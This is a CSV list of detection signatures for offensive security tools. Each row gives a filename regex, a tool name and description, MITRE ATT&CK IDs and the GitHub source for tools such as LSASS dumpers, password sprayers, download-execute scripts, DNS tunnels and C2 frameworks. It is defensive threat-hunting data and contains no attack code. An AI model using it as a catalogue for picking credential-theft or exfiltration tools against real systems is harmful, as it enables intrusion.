"*\dll-sideload\main.cpp*",".{0,1000}\\dll\-sideload\\main\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\DllVoidFunction.txt*",".{0,1000}\\DllVoidFunction\.txt.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\dns2tcp\*",".{0,1000}\\dns2tcp\\.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\dns2tcp\server*",".{0,1000}\\dns2tcp\\server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\dns2tcp-0.*",".{0,1000}\\dns2tcp\-0\..{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\dnscan.py*",".{0,1000}\\dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*\dns-cat.exe*",".{0,1000}\\dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*\dnschef.exe*",".{0,1000}\\dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef.ini*",".{0,1000}\\dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef.log*",".{0,1000}\\dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef.py*",".{0,1000}\\dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnschef-ng\*",".{0,1000}\\dnschef\-ng\\.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*\dnscrypt-proxy*",".{0,1000}\\dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*\dnsdump.py*",".{0,1000}\\dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*\DnSpoof.ps1*",".{0,1000}\\DnSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\dnsrecon.py*",".{0,1000}\\dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\dnsrecon-subdomain-bruteforce.py*",".{0,1000}\\dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\dnsstager.py*",".{0,1000}\\dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*\dns-zone-transfer.py*",".{0,1000}\\dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\DocsPLZ.cpp*",".{0,1000}\\DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\DocsPLZ.exe*",".{0,1000}\\DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\DoHC2.cs*",".{0,1000}\\DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\domain_admins.txt*",".{0,1000}\\domain_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\DomainGPPPassword.cs*",".{0,1000}\\DomainGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\DomainPasswordSpray\*",".{0,1000}\\DomainPasswordSpray\\.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\DomainPasswordSpray-master*",".{0,1000}\\DomainPasswordSpray\-master.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\DomainRecon\*.txt",".{0,1000}\\DomainRecon\\.{0,1000}\.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\donut.exe*",".{0,1000}\\donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*\donut\VanillaProgram.bin*",".{0,1000}\\donut\\VanillaProgram\.bin.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\Doraemon*",".{0,1000}\\Doraemon.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\doucme.csproj*",".{0,1000}\\doucme\.csproj.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*\doucme.exe*",".{0,1000}\\doucme\.exe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*\doucme.sln*",".{0,1000}\\doucme\.sln.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*\Download_Execute.ps1*",".{0,1000}\\Download_Execute\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Download_Execute_PS.ps1*",".{0,1000}\\Download_Execute_PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\downloadexec.lua*",".{0,1000}\\downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\Download-Execute-PS.ps1*",".{0,1000}\\Download\-Execute\-PS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Dpapi.ps1*",".{0,1000}\\Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\DragonCastle.dll*",".{0,1000}\\DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\DragonCastle.pdb*",".{0,1000}\\DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\DragonCastle-master\*",".{0,1000}\\DragonCastle\-master\\.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\DReverseClint.go*",".{0,1000}\\DReverseClint\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\DReverseServer.go*",".{0,1000}\\DReverseServer\.go.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*\dropper\dropit.py*",".{0,1000}\\dropper\\dropit\.py.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\dropper\dropper.vba*",".{0,1000}\\dropper\\dropper\.vba.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\drop-sc.py*",".{0,1000}\\drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\DSInternals.psd1*",".{0,1000}\\DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*\duedlligence.dll*",".{0,1000}\\duedlligence\.dll.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*\dump.ps1*",".{0,1000}\\dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\dumpCredStore.ps1*",".{0,1000}\\dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\dumper.ps1*",".{0,1000}\\dumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\dumpert.*",".{0,1000}\\dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\Dumpert\*",".{0,1000}\\Dumpert\\.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\DumpIt.exe*",".{0,1000}\\DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*\DumpLsass.ps1*",".{0,1000}\\DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 